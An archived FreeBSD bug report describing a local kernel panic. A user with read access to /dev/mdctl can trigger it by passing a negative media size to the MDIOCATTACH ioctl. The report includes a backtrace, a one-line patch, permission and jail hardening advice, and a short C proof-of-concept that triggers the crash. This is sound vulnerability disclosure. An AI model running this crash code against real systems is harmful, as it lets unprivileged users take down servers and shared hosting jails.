Date: Tue, 17 Jul 2012 17:50:25 GMT From: Filip Palian <filip.palian@pjwstk.edu.pl> To: freebsd-gnats-submit@FreeBSD.org Subject: misc/169947: System crash via ioctl() on mdctl. Message-ID: <201207171750.q6HHoPQ2098957@red.freebsd.org> Resent-Message-ID: <201207171800.q6HI0Mws064833@freefall.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 169947
>Category: misc
>Synopsis: System crash via ioctl() on mdctl.
>Confidential: no
>Severity: non-critical
>Priority: low
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Tue Jul 17 18:00:22 UTC 2012
>Closed-Date:
>Last-Modified:
>Originator: Filip Palian
>Release: FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root at obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
User who has read permission on "/dev/mdctl" is able to crash the system (also within the jail if only provided by devfs(.rules)) via ioctl() handler in "/usr/src/sys/dev/md/md.c:1082". The crash occures in function swap_release_by_cred() (swap_pager.c:285) called in vm_object_deallocate() (md.c:1119). Some detailed information included below.
-- cut --
fbsd dumped core - see /var/crash/vmcore.0
.
panic: swap_reserved < decr
.
Unread portion of the kernel message buffer:
panic: swap_reserved < decr
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b1d7 at kdb_backtrace+0x47
#1 0xc0a18737 at panic+0x117
#2 0xc0c6d147 at swap_release_by_cred+0x97 <--- paniced here
#3 0xc0c85684 at vm_object_destroy+0xd4
#4 0xc0c87825 at vm_object_terminate+0x2c5
#5 0xc0c880a7 at vm_object_deallocate+0x877
#6 0xc0c7da51 at vm_map_entry_deallocate+0x21
#7 0xc0c7daba at vm_map_process_deferred+0x2a
#8 0xc0c7ebfa at _vm_map_unlock+0x4a
#9 0xc0c7f2eb at vm_map_remove+0x6b
#10 0xc0c82543 at vmspace_exit+0xc3
#11 0xc09e9038 at exit1+0x6f8
#12 0xc09e9d7d at sys_sys_exit+0x1d
#13 0xc0d4c275 at syscall+0x355
#14 0xc0d35a51 at Xint0x80_syscall+0x21
Uptime: 2h36m43s
Physical memory: 1383 MB
Dumping 80 MB: 65 49 33 17 1
-- cut --
>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
The "mediasize" member of the "md_s" structure should be of unsigned type. Currently it's of type off_t, which is "typedef long __int64_t".
Alternative solution would be to add the following sanity condition in md.c:1091 (not mentioning the author's comment):
-- cut --
--- dev/md/md.c.old 2012-07-15 21:32:40.000000000 +0200
+++ dev/md/md.c 2012-07-15 21:30:00.000000000 +0200
@@ -1088,7 +1088,7 @@ mdcreate_swap(struct md_s *sc, struct md
* Range check. Disallow negative sizes or any size less then the
* size of a page. Then round to a page.
*/
- if (sc->mediasize == 0 || (sc->mediasize % PAGE_SIZE) != 0)
+ if (sc->mediasize <= 0 || (sc->mediasize % PAGE_SIZE) != 0)
return (EDOM);
/*
-- cut --
To prevent evil users from doing bad things administrators should ensure, that "/dev/mdctl" permissions are +rw (600) only for root.
For servers where jails are provided for untrusted users (e.g. hosting companies) access to "/dev/mdctl" device should be forbidden/hidden using defvs.rules.
Patch attached with submission follows:
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mdioctl.h>
#include <sys/mman.h>
int main()
{
int f;
void *p;
struct md_ioctl s;
struct stat ss;
s.md_version = MDIOVERSION;
// s.md_type = MD_SWAP;
s.md_type = MD_PRELOAD;
s.md_options = MD_CLUSTER | MD_AUTOUNIT | MD_COMPRESS;
// typedef long long = int64 = off_t
//s.md_mediasize = 4096*1000000000000000000000000000000000000000000000000000;
s.md_mediasize = -1000000000000;
if (stat("/dev/mdctl", &ss) != 0) {
printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
exit (0);
}
f = open("/dev/mdctl", O_RDONLY, 0);
printf("say goodnight...\n");
if (ioctl(f, MDIOCATTACH, &s) < 0)
printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));
printf("no +r no fun\n");
exit (0);
}
>Release-Note:
>Audit-Trail:
>Unformatted:
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?201207171750.q6HHoPQ2098957>